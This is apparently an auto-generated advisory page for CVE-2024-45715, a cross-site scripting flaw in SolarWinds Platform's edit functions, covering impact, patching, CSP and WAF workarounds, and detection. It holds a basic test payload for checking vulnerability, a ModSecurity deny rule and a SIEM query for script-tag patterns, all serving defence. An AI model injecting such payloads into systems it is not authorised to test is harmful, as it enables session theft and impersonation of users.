CVE-2024-45715
📋 TL;DR
This Cross-Site Scripting (XSS) vulnerability in SolarWinds Platform allows attackers to inject malicious scripts when users perform edit operations on existing elements. If exploited, attackers could steal session cookies, redirect users to malicious sites, or perform actions on behalf of authenticated users. Organizations using affected SolarWinds Platform versions are at risk.
💻 Affected Systems
- SolarWinds Platform
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, gain full control of the SolarWinds Platform, pivot to internal networks, and deploy ransomware or exfiltrate sensitive data.
Likely Case
Attackers steal session cookies to impersonate authenticated users, modify configurations, or access monitoring data and network information.
If Mitigated
With proper input validation and output encoding, the vulnerability would be prevented, though users might still see attempted malicious payloads in logs.
🎯 Exploit Status
XSS vulnerabilities typically have low exploitation complexity; requires user to interact with malicious content (reflected XSS) or visit a page with stored malicious content (stored XSS).
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check SolarWinds advisory for specific patched versions
Vendor Advisory: https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-45715
Restart Required: Yes
Instructions:
1. Log into SolarWinds Platform as administrator. 2. Navigate to Settings > All Settings > Product Updates. 3. Check for available updates. 4. Download and apply the latest security patch. 5. Restart SolarWinds services as prompted.
🔧 Temporary Workarounds
Implement Content Security Policy (CSP)
allAdd CSP headers to restrict script execution sources and reduce XSS impact
Add to web server configuration: Content-Security-Policy: default-src 'self'; script-src 'self'
Input Validation Web Application Firewall (WAF) Rules
allConfigure WAF to block XSS payload patterns in edit function parameters
ModSecurity rule: SecRule ARGS "@detectXSS" "id:1001,phase:2,deny,status:403"
🧯 If You Can't Patch
- Implement strict input validation and output encoding in custom code that interacts with edit functions
- Restrict access to SolarWinds Platform web interface using network segmentation and only allow trusted IP addresses
🔍 How to Verify
Check if Vulnerable:
Test edit functions by attempting to inject basic XSS payloads like <script>alert('XSS')</script> and observe if script executesCheck Version:
In SolarWinds web interface: Help > About SolarWinds PlatformVerify Fix Applied:
After patching, retest with XSS payloads to confirm they are properly sanitized and do not execute📡 Detection & Monitoring
Log Indicators:
- Unusual edit operations with script tags or JavaScript in parameters
- Multiple failed login attempts following suspicious edit activities
Network Indicators:
- HTTP requests containing script tags or JavaScript in edit function parameters
- Unusual outbound connections from SolarWinds server after edit operations
SIEM Query:
source="solarwinds" AND (url="*edit*" AND (param="*<script>*" OR param="*javascript:*"))